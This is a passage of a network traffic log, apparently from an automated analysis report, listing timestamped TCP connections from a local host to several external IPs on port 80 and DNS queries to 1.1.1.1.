                                                                                                                        Nov 20, 2024 16:55:50.222280979 CET4999980192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:51.241122007 CET5000080192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:51.360860109 CET8050000203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:51.360970974 CET5000080192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:51.375801086 CET5000080192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:51.495593071 CET8050000203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:52.637221098 CET8050000203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:52.637243032 CET8050000203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:52.637402058 CET5000080192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:52.640508890 CET5000080192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:52.760317087 CET8050000203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:58.840003014 CET5000180192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:55:58.959760904 CET8050001103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:58.959886074 CET5000180192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:55:58.974507093 CET5000180192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:55:59.094386101 CET8050001103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:00.289736032 CET8050001103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:00.289769888 CET8050001103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:00.289916039 CET5000180192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:00.486295938 CET5000180192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:01.507256031 CET5000280192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:01.627542973 CET8050002103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:01.627650023 CET5000280192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:01.642092943 CET5000280192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:01.762372971 CET8050002103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:02.889866114 CET8050002103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:02.889894962 CET8050002103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:02.889986038 CET5000280192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:03.158416033 CET5000280192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:04.177124977 CET5000380192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:04.296931982 CET8050003103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:04.297070980 CET5000380192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:04.313740969 CET5000380192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:04.436176062 CET8050003103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:04.442292929 CET8050003103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:05.733294964 CET8050003103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:05.733366966 CET8050003103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:05.733561039 CET5000380192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:05.814349890 CET5000380192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:06.833165884 CET5000480192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:06.954411983 CET8050004103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:06.958679914 CET5000480192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:06.973932981 CET5000480192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:07.095505953 CET8050004103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:08.272437096 CET8050004103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:08.272510052 CET8050004103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:08.272526026 CET8050004103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:08.272690058 CET5000480192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:08.275801897 CET5000480192.168.2.11103.224.182.242
                                                                                                                        Nov 20, 2024 16:56:08.400419950 CET8050004103.224.182.242192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:14.042313099 CET5000580192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:14.501431942 CET8050005199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:14.502415895 CET5000580192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:14.525746107 CET5000580192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:14.645997047 CET8050005199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:15.690228939 CET8050005199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:15.690253973 CET8050005199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:15.690310001 CET5000580192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:15.690339088 CET8050005199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:15.690370083 CET5000580192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:16.034630060 CET5000580192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:17.053843021 CET5000680192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:17.174098969 CET8050006199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:17.174189091 CET5000680192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:17.193734884 CET5000680192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:17.313306093 CET8050006199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:18.363274097 CET8050006199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:18.363298893 CET8050006199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:18.363321066 CET8050006199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:18.363418102 CET5000680192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:18.363418102 CET5000680192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:18.706343889 CET5000680192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:19.724838972 CET5000780192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:19.844474077 CET8050007199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:19.845170975 CET5000780192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:19.862993956 CET5000780192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:19.984644890 CET8050007199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:19.984880924 CET8050007199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:20.993493080 CET8050007199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:20.993572950 CET8050007199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:20.993660927 CET5000780192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:20.993737936 CET8050007199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:20.993885994 CET5000780192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:21.376755953 CET5000780192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:22.396650076 CET5000880192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:22.516638994 CET8050008199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:22.520467997 CET5000880192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:22.529843092 CET5000880192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:22.650473118 CET8050008199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:23.664572954 CET8050008199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:23.664628983 CET8050008199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:23.664648056 CET8050008199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:23.664772034 CET5000880192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:23.664819956 CET5000880192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:23.667301893 CET5000880192.168.2.11199.59.243.227
                                                                                                                        Nov 20, 2024 16:56:23.788737059 CET8050008199.59.243.227192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:29.313375950 CET5000980192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:29.432986975 CET805000913.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:29.433068991 CET5000980192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:29.451134920 CET5000980192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:29.570765972 CET805000913.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:30.536516905 CET805000913.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:30.536900043 CET5000980192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:30.954948902 CET5000980192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:31.080138922 CET805000913.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:31.977997065 CET5001080192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:32.100924015 CET805001013.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:32.101069927 CET5001080192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:32.117017031 CET5001080192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:32.237526894 CET805001013.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:33.246777058 CET805001013.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:33.246856928 CET5001080192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:33.626780033 CET5001080192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:33.746380091 CET805001013.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:34.646267891 CET5001180192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:34.765969038 CET805001113.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:34.766088963 CET5001180192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:34.781539917 CET5001180192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:34.901170015 CET805001113.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:34.901186943 CET805001113.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:35.914720058 CET805001113.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:35.914983988 CET5001180192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:36.286493063 CET5001180192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:36.406266928 CET805001113.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:37.304478884 CET5001280192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:37.427484989 CET805001213.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:37.427570105 CET5001280192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:37.440304041 CET5001280192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:37.561165094 CET805001213.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:38.575033903 CET805001213.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:38.575089931 CET805001213.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:38.575238943 CET5001280192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:38.578250885 CET5001280192.168.2.1113.248.169.48
                                                                                                                        Nov 20, 2024 16:56:38.705370903 CET805001213.248.169.48192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:44.251597881 CET5001380192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:44.371134043 CET805001338.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:44.371288061 CET5001380192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:44.386914968 CET5001380192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:44.507134914 CET805001338.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:45.892604113 CET5001380192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:45.940375090 CET805001338.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:45.940438986 CET5001380192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:45.940633059 CET805001338.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:45.940697908 CET5001380192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:46.016175985 CET805001338.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:46.016320944 CET5001380192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:46.921921015 CET5001480192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:47.041676044 CET805001438.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:47.041826963 CET5001480192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:47.061878920 CET5001480192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:47.185075045 CET805001438.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:48.564404964 CET5001480192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:48.616821051 CET805001438.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:48.616954088 CET5001480192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:48.617197990 CET805001438.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:48.617252111 CET5001480192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:48.685832977 CET805001438.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:48.685902119 CET5001480192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:49.623934031 CET5001580192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:49.746825933 CET805001538.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:49.746922016 CET5001580192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:49.860483885 CET5001580192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:49.980159044 CET805001538.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:49.980228901 CET805001538.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:51.363568068 CET805001538.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:51.363656998 CET805001538.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:51.363713026 CET5001580192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:51.376795053 CET5001580192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:52.415349007 CET5001680192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:52.535310030 CET805001638.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:52.535479069 CET5001680192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:52.546979904 CET5001680192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:52.666717052 CET805001638.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:54.132671118 CET805001638.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:54.133050919 CET805001638.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:54.133157015 CET5001680192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:54.136514902 CET5001680192.168.2.1138.47.232.194
                                                                                                                        Nov 20, 2024 16:56:54.257189035 CET805001638.47.232.194192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:59.618371010 CET5001780192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:56:59.742876053 CET8050017172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:59.742953062 CET5001780192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:56:59.760895967 CET5001780192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:56:59.883832932 CET8050017172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:00.972490072 CET8050017172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:00.972517014 CET8050017172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:00.972534895 CET8050017172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:00.972632885 CET5001780192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:01.267503023 CET5001780192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:02.289532900 CET5001880192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:02.412898064 CET8050018172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:02.413000107 CET5001880192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:02.428574085 CET5001880192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:02.552100897 CET8050018172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:03.655211926 CET8050018172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:03.655276060 CET8050018172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:03.655324936 CET5001880192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:03.655766010 CET8050018172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:03.655810118 CET5001880192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:03.939330101 CET5001880192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:04.962454081 CET5001980192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:05.084619999 CET8050019172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:05.084723949 CET5001980192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:05.099891901 CET5001980192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:05.219660044 CET8050019172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:05.219677925 CET8050019172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:06.447819948 CET8050019172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:06.447949886 CET8050019172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:06.448067904 CET5001980192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:06.448564053 CET8050019172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:06.452560902 CET5001980192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:06.611244917 CET5001980192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:07.641102076 CET5002080192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:07.762496948 CET8050020172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:07.762614012 CET5002080192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:07.774820089 CET5002080192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:07.894659042 CET8050020172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:09.031634092 CET8050020172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:09.031687021 CET8050020172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:09.031727076 CET8050020172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:09.031955004 CET5002080192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:09.032361984 CET8050020172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:09.033556938 CET5002080192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:09.037062883 CET5002080192.168.2.11172.67.159.24
                                                                                                                        Nov 20, 2024 16:57:09.161570072 CET8050020172.67.159.24192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:14.793492079 CET5002180192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:14.916534901 CET8050021208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:14.916692972 CET5002180192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:14.932281017 CET5002180192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:15.051928997 CET8050021208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:16.084970951 CET8050021208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:16.085067034 CET5002180192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:16.440804005 CET5002180192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:16.564183950 CET8050021208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:17.459619045 CET5002280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:17.579273939 CET8050022208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:17.579365015 CET5002280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:17.605170012 CET5002280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:17.724889994 CET8050022208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:18.784195900 CET8050022208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:18.784281015 CET5002280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:19.114484072 CET5002280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:19.234172106 CET8050022208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:20.131088972 CET5002380192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:20.252856970 CET8050023208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:20.253360987 CET5002380192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:20.268230915 CET5002380192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:20.391396999 CET8050023208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:20.392072916 CET8050023208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:21.459163904 CET8050023208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:21.459218979 CET5002380192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:21.783189058 CET5002380192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:21.902776003 CET8050023208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:22.804971933 CET5002480192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:22.925383091 CET8050024208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:22.925509930 CET5002480192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:22.938503027 CET5002480192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:23.068725109 CET8050024208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:25.490998030 CET8050024208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:25.491014957 CET8050024208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:25.491031885 CET8050024208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:25.491045952 CET8050024208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:25.491137981 CET5002480192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:25.501699924 CET5002480192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:57:25.622237921 CET8050024208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:31.298537970 CET5002580192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:31.428864956 CET8050025185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:31.429111004 CET5002580192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:31.444202900 CET5002580192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:31.568588018 CET8050025185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:32.683039904 CET8050025185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:32.683119059 CET8050025185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:32.683253050 CET5002580192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:34.314433098 CET5002580192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:35.334521055 CET5002680192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:35.457309961 CET8050026185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:35.457405090 CET5002680192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:35.476897001 CET5002680192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:35.596786022 CET8050026185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:36.804306030 CET8050026185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:36.805226088 CET8050026185.27.134.144192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:36.805342913 CET5002680192.168.2.11185.27.134.144
                                                                                                                        Nov 20, 2024 16:57:36.990504026 CET5002680192.168.2.11185.27.134.144
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 20, 2024 16:54:06.230840921 CET5473053192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:54:06.904459953 CET53547301.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:23.661644936 CET5280153192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:54:24.075999975 CET53528011.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:39.350095987 CET5421653192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:54:39.893897057 CET53542161.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:54.333287954 CET5771353192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:54:54.973490000 CET53577131.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:12.349807024 CET6178453192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:55:12.813208103 CET53617841.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:27.319801092 CET5451253192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:55:28.236885071 CET53545121.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:42.678258896 CET5113953192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:55:43.234446049 CET53511391.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:57.648458958 CET6197753192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:55:58.658006907 CET6197753192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:55:58.837333918 CET53619771.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:58.837354898 CET53619771.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:13.289025068 CET5322553192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:56:14.031459093 CET53532251.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:28.683430910 CET6017353192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:56:29.310043097 CET53601731.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:43.584996939 CET5401653192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:56:44.248764038 CET53540161.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:56:59.147289991 CET5950053192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:56:59.615103960 CET53595001.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:14.053189039 CET5561253192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:57:14.790102959 CET53556121.1.1.1192.168.2.11
                                                                                                                        Nov 20, 2024 16:57:30.521346092 CET6415053192.168.2.111.1.1.1
                                                                                                                        Nov 20, 2024 16:57:31.293054104 CET53641501.1.1.1192.168.2.11
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
